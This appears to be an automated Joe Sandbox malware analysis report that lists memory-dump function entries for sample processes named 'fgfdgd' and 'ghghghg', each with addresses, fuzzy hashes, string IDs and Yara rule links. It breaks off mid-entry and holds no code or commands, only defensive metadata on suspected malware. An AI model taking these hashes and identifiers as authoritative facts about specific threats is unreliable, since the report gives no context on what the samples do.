                                        • Opcode ID: dcf440904b6d56056e3d739330a27cc4ff638ad1ad0beac6f2c4c5279a53390d
                                        • Instruction ID: 784d3e01491c13f5fe41cf3fa5050ae37b4fe9a7af694d5ef37d62f5306c9227
                                        • Opcode Fuzzy Hash: dcf440904b6d56056e3d739330a27cc4ff638ad1ad0beac6f2c4c5279a53390d
                                        • Instruction Fuzzy Hash: 20F01C31D19A0F9FEF519F9698615FD77B1FF483A0F5018BAC10EA21A1DA282845C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D1F4A Relevance: 1.7, Strings: 1, Instructions: 474COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]pt
                                        • API String ID: 0-1447562928
                                        • Opcode ID: 2cb20229480f945a59ead697e244b539337cb019a990a2f602e91e5ba558ed23
                                        • Instruction ID: 8c30902eefe6d69e72ae16b965b530238bf1aa7e7440e0861ff1ae32071b2eab
                                        • Opcode Fuzzy Hash: 2cb20229480f945a59ead697e244b539337cb019a990a2f602e91e5ba558ed23
                                        • Instruction Fuzzy Hash: 36E1293191ED494BE768D619A8725B477D0FF45332F044AF9D15EC39B2EE29A80E8B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D1B0F Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#pt
                                        • API String ID: 0-2469598167
                                        • Opcode ID: ec61833722afa440ad90c0db52e41577f525d3479d9970ae40f9384d181bd115
                                        • Instruction ID: 765239c6ed05a713468d665a2327bd486cc588f0d404eeb586e7293413fc030c
                                        • Opcode Fuzzy Hash: ec61833722afa440ad90c0db52e41577f525d3479d9970ae40f9384d181bd115
                                        • Instruction Fuzzy Hash: 3581E431A1CA0D8FE768EA19D895BB973E5FF45321F1045BAD08FC32A1EE25AC478741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D2DAB Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r6ft
                                        • API String ID: 0-2757449517
                                        • Opcode ID: 5b94ee733453f7cb51ec49160f8b0ba5346bba8a218d795f29b4e6989cbcad55
                                        • Instruction ID: dd0124b7fdee3c8ce402c05c5a6cd8f84b10a9bb0180b6bd51cceb79cbe3d551
                                        • Opcode Fuzzy Hash: 5b94ee733453f7cb51ec49160f8b0ba5346bba8a218d795f29b4e6989cbcad55
                                        • Instruction Fuzzy Hash: 7CD09231714D088FEF85EB1CC458EA673E2EBA8705724406AD00AC72A5DE25ED86CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D0B25 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11f4dcfa980a39c70ea8fbef3d37882032c1162a5b9e5d541ac2b9847833f614
                                        • Instruction ID: 3eb0c064ba08f19ce1d50c4bc08da9f94c6e12bd6a7a4c42095edba8494082d6
                                        • Opcode Fuzzy Hash: 11f4dcfa980a39c70ea8fbef3d37882032c1162a5b9e5d541ac2b9847833f614
                                        • Instruction Fuzzy Hash: 1A41E731A0DE098FDB69DE19C85A6A877E1FF84365F0016F9D04DC75B2DE28A81EC781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D2F3F Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e55cbc7f451844e4f0a856d5d85d57ce007cd049b5b2f45a0260575f9d43b00b
                                        • Instruction ID: 04097ace9894ec33f3bee50d8fb9407835d47e230b19807e0956c8e7d320b1d0
                                        • Opcode Fuzzy Hash: e55cbc7f451844e4f0a856d5d85d57ce007cd049b5b2f45a0260575f9d43b00b
                                        • Instruction Fuzzy Hash: 28317C3062DA460FD305DA2DC480DA1B7F2EFE6311B188ABDE0C9C716BD938E8868741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D2AAC Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcbf55dbf61f1a4773ba5fb76e8e3a5ab4a2d271dd0a9cd5f71a85b91f368341
                                        • Instruction ID: c92b80c93d3ef6b772ae77595be91378bf3119596128190ecee6f9c04e7de889
                                        • Opcode Fuzzy Hash: fcbf55dbf61f1a4773ba5fb76e8e3a5ab4a2d271dd0a9cd5f71a85b91f368341
                                        • Instruction Fuzzy Hash: DD217C30348D088FDF89FF58D099E6933E1EBA970171041A9D50AC76A6DE25ED85CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D0BDC Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72c2fad31181260dc898cd06b2268fe053d8d741a40d40245478e575c5c6c9f3
                                        • Instruction ID: 75a5fb2a783623729dabe3ec60faf34872ac40da862f262920885b43242951e8
                                        • Opcode Fuzzy Hash: 72c2fad31181260dc898cd06b2268fe053d8d741a40d40245478e575c5c6c9f3
                                        • Instruction Fuzzy Hash: 5E21B031A0D9088FDBA9EA2C94566F877D1EF98321F0016FAD04EC7572DA68AC098781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D204A Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12d0aa5ae61d2c7c4049aa29a7564a39d8f9044c0211435b8f5d61f21f76f549
                                        • Instruction ID: 212999a30773f35727987a81b90d62182eb26e03fb172a89d7d7350bfef4e4f4
                                        • Opcode Fuzzy Hash: 12d0aa5ae61d2c7c4049aa29a7564a39d8f9044c0211435b8f5d61f21f76f549
                                        • Instruction Fuzzy Hash: B4111231A08A188FDB58DF1CE445AADB7F1FF59321F1042ABE04ED3662DB31AC468B45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D0C25 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 732424665bd01ee0458e79b12290b518d0dfac80d4af173f60656dc51ef66a09
                                        • Instruction ID: b9902a44aeb8cd5194892010c9292e54037f3fc58b27b6d6f8f6992ee8c1829e
                                        • Opcode Fuzzy Hash: 732424665bd01ee0458e79b12290b518d0dfac80d4af173f60656dc51ef66a09
                                        • Instruction Fuzzy Hash: 2101927170D9088FD798DA1CA4666B977D1EF88321B0006BFE08EC7972DE25A8198741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D28D1 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aea4580d0002e00e7bb0baaf74c2f365894e4196435ef7c95f9896ceaa071437
                                        • Instruction ID: 9c1e4e975da930a4f516c3a0e26fba01adbc27ae43d9bf95064585773fa71bf1
                                        • Opcode Fuzzy Hash: aea4580d0002e00e7bb0baaf74c2f365894e4196435ef7c95f9896ceaa071437
                                        • Instruction Fuzzy Hash: DD01A4312488188FDF89EF18D098E6573E2FB783017554559D44ACB661DE32EC89CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D2871 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58fd9a835f7dcb814148308dd735298c42432b5f7a7b854bd55b96fced654221
                                        • Instruction ID: 9c9ec8c1b1c7019e0f89bbaf5c92b109b81645c9254ac381892b51d1caa722d7
                                        • Opcode Fuzzy Hash: 58fd9a835f7dcb814148308dd735298c42432b5f7a7b854bd55b96fced654221
                                        • Instruction Fuzzy Hash: FCF0A9312489188FDF89FF28C099E6537E1EF787417154199E40ACB6A5DE31ED85CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D2946 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a5655491343188297ca85af00424f8b65cd70ecb76691778db5d847e45815fe2
                                        • Instruction ID: e18c056d01344e25c5b9d035736357aa58219938a3eac79ad8ee3f438063cda1
                                        • Opcode Fuzzy Hash: a5655491343188297ca85af00424f8b65cd70ecb76691778db5d847e45815fe2
                                        • Instruction Fuzzy Hash: 0AF0A431248D088FEF85FF58D098E6573E2EB78301B154569D54AC76B1DE22ED89CF41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D162E Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a6433b616e91121a166ee5ddc8cf57dd6a95873fd05ae61fc3aa99bc4909def
                                        • Instruction ID: 9d4a8cdfb52010872790a9266d328eec58d8c6e3e42291a4c2fbefb754570977
                                        • Opcode Fuzzy Hash: 9a6433b616e91121a166ee5ddc8cf57dd6a95873fd05ae61fc3aa99bc4909def
                                        • Instruction Fuzzy Hash: 5CF0677090895D8FDF98DB98C4A4BA8B7B1FB68301F1045AAC00EE7695DE31A985CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D1917 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21770d61f1fe2602ac419cb4d5594a6ac1e4fa5b75c34e8a6c4c33b7783390cc
                                        • Instruction ID: 3883e5a8134a1c7fa1e0021ec01c81612aeb9757bba9d5f539f5eb91dcfa6612
                                        • Opcode Fuzzy Hash: 21770d61f1fe2602ac419cb4d5594a6ac1e4fa5b75c34e8a6c4c33b7783390cc
                                        • Instruction Fuzzy Hash: A8F0A531A5491C8FDF94EA18D894BA8B3B1EBA9301F14459AD00EE3251CA729DC5CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D10E1 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eec6a8f34b9c119dd8e2aa54d0644e0c6e1c6ca934fab66cd2ffbcccbd54391
                                        • Instruction ID: 8af5a7bf6a85362ce156ef96f3872e44e07f80811f52d3fae6078eb0e19711b4
                                        • Opcode Fuzzy Hash: 5eec6a8f34b9c119dd8e2aa54d0644e0c6e1c6ca934fab66cd2ffbcccbd54391
                                        • Instruction Fuzzy Hash: E4D01705A6ED6B4BA5A9A11A30652BC12C18B8C6B2B9525F6C40ECA2E1CC482CD69281
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D1110 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ada1f135d0102ed97f223dc698c119c91cf7f74689952241f70cb3fca2efc519
                                        • Instruction ID: e10b19442f048edaf5a80034eab28f68c52f2f4440043b9c8abe683fdd974471
                                        • Opcode Fuzzy Hash: ada1f135d0102ed97f223dc698c119c91cf7f74689952241f70cb3fca2efc519
                                        • Instruction Fuzzy Hash: 6DE0C232558C094FDF98F669E084EE173E0DB28300701459AD41AC72A9DD25DC81CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D27FF Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8877f47aa9e11df0a2b299752e9a63daf61fee963b5140f21e8d7e28ea9a9d0
                                        • Instruction ID: 4c1d23e8a8051adcb56ae0ceb946f9e5b2716b60b48a960696177f756299255a
                                        • Opcode Fuzzy Hash: f8877f47aa9e11df0a2b299752e9a63daf61fee963b5140f21e8d7e28ea9a9d0
                                        • Instruction Fuzzy Hash: 67E0EC30345C084FAA85EE2C806DE6833D2EBA835175905A5E40AC72B2DD25DC868741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D37DE Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d17f27098357878cb6bd1590c65c93e864a57489fd7707a8cb629f4bf6c6e935
                                        • Instruction ID: 20ab794fdbd8bc2c732599b533c896d65fe8878696ab5e349443a014c6d1e640
                                        • Opcode Fuzzy Hash: d17f27098357878cb6bd1590c65c93e864a57489fd7707a8cb629f4bf6c6e935
                                        • Instruction Fuzzy Hash: 33D05E327588184FEB44F718E445BA5B3D1EB6432171545A6D00AC71A5ED27D883CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D2D8A Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 176cf77c67e2be1f3e1a2ca8142b3bf07c272c40a3ef4d9b28e6c0454a791262
                                        • Instruction ID: 3c234ae7365896e822276f586f006d2b5f85c4015b3e67606e99dbdbf9d4d768
                                        • Opcode Fuzzy Hash: 176cf77c67e2be1f3e1a2ca8142b3bf07c272c40a3ef4d9b28e6c0454a791262
                                        • Instruction Fuzzy Hash: D4C09B05728D0D1F51D4EA5C3C5936D63D2D7EC4917C5127B551EC335ADC555C4B03C2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D10C3 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: e677b6065e220608c9dc80b24baa371a3453c48b164af80be4db91b714d2070f
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: 20C08011EDF9174BF994709570120FC7250CF49270B4438F9C40F81192DC4D18D54641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167D198F Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d402232c1bcd6b8333358ba7c0a94d0b157e81aeb5d66a9afdadead3ebb30a73
                                        • Instruction ID: 33f89857f6a8b59955aabb59b4a5ade77e351e323be599137d59c162198498d8
                                        • Opcode Fuzzy Hash: d402232c1bcd6b8333358ba7c0a94d0b157e81aeb5d66a9afdadead3ebb30a73
                                        • Instruction Fuzzy Hash: 37D05E34C1E68DD7DB10DB2095110EC7B20FF40311F2005E6E94D02190CA74675C9682
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FF750F21140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2377560662.00007FF750F21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF750F20000, based on PE: true
                                        • Associated: 00000014.00000002.2377507476.00007FF750F20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2377844443.00007FF750F27000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2377862925.00007FF750F29000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2377880441.00007FF750F2A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2378410154.00007FF751197000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2378809080.00007FF75119D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2379442732.00007FF751413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000014.00000002.2379461487.00007FF751415000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_7ff750f20000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: 43d69c94d8d368fbad28578a4746984812db82bff8dd8ca30af7290e9a34ebb9
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: C1B0922190834B84E2007B219C4125876606B18740F880020C50C02392CA7EA0504B20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFE18731F49 Relevance: 1.7, Strings: 1, Instructions: 473COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]$u
                                        • API String ID: 0-4288194166
                                        • Opcode ID: f1b564db8965c2153ec5aef76359f9782c00722110b3937efed1f982230b607c
                                        • Instruction ID: 4699fd393b2d84d42b6122de0769a824d490a8e6e7549a383eff4e6c7376c6d2
                                        • Opcode Fuzzy Hash: f1b564db8965c2153ec5aef76359f9782c00722110b3937efed1f982230b607c
                                        • Instruction Fuzzy Hash: E0E18D3089ED4A4BE768C61998415B477E0FF55331F0001F9F85DC35B2EE196A2EC6A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187319D4 Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#$u
                                        • API String ID: 0-988003089
                                        • Opcode ID: 6c3f174714087aef0d1487116a96b38f11ad701c168a7caa7d9d5a7024fb813d
                                        • Instruction ID: 5e83692fd415c09fdcff9cba1ad3226a84441b09a52789610750ecb76d1214b1
                                        • Opcode Fuzzy Hash: 6c3f174714087aef0d1487116a96b38f11ad701c168a7caa7d9d5a7024fb813d
                                        • Instruction Fuzzy Hash: E2B1F131A1DE0D8FEB58EB18D844AB873E1FF69321F1000BAD44EC31A2DE29A956C755
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18731B0F Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#$u
                                        • API String ID: 0-988003089
                                        • Opcode ID: 8c1a82f0f4f1bfcd3f01a76e2b1ed9aad87123b3e5a28f0ae55f037feb9a2907
                                        • Instruction ID: 23ab018b85f89964be69e04e7bcf169a0e2acc3d714976795e8219c196556fb0
                                        • Opcode Fuzzy Hash: 8c1a82f0f4f1bfcd3f01a76e2b1ed9aad87123b3e5a28f0ae55f037feb9a2907
                                        • Instruction Fuzzy Hash: 1B41EF30A19E0D8FE7A8EA19C85477973E6FF59314F1040F9E44EC32A0DE34AD558716
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187308AA Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: k_H
                                        • API String ID: 0-1575631982
                                        • Opcode ID: 4f2e9ba2a62bc1f912223621e3b40d92678c22f6c2fd725d59fea14870846fbd
                                        • Instruction ID: dc4b9f9bbba85736cea52791e76cad2e37817b3f09a2bba768718977e92db780
                                        • Opcode Fuzzy Hash: 4f2e9ba2a62bc1f912223621e3b40d92678c22f6c2fd725d59fea14870846fbd
                                        • Instruction Fuzzy Hash: 1FF08C31D59A0F9EEF41CB8588815FDB7F1FF68320F1000BAC40AE21A1DA282A248786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18730B25 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a34dc61758ab8dc80af652cf67acbe2abd1a6103636952819cf5ce48f89848e
                                        • Instruction ID: 260c60def17b3485694407ef0e0800cabb3501c027ab8f43f94f6024cc2754dc
                                        • Opcode Fuzzy Hash: 7a34dc61758ab8dc80af652cf67acbe2abd1a6103636952819cf5ce48f89848e
                                        • Instruction Fuzzy Hash: 00411D31A4ED094FDB59DA1CC84A6A873D0FF54329F0002F9D85DC7571DE38A92A8B86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18732F3F Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bbe3754780f6b108ca08fae5a16a8fa788446ecad583b6660af111f35e6d9de
                                        • Instruction ID: e7bbe4c7995ab4b929d4de487968c61bb9a5b17aaa12994a6674a616da44e384
                                        • Opcode Fuzzy Hash: 0bbe3754780f6b108ca08fae5a16a8fa788446ecad583b6660af111f35e6d9de
                                        • Instruction Fuzzy Hash: 1B31793065DA460FC705EA2CC440CA1B7E2EFE6301B1886B9E4C9C726BD928E9868B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18730B42 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
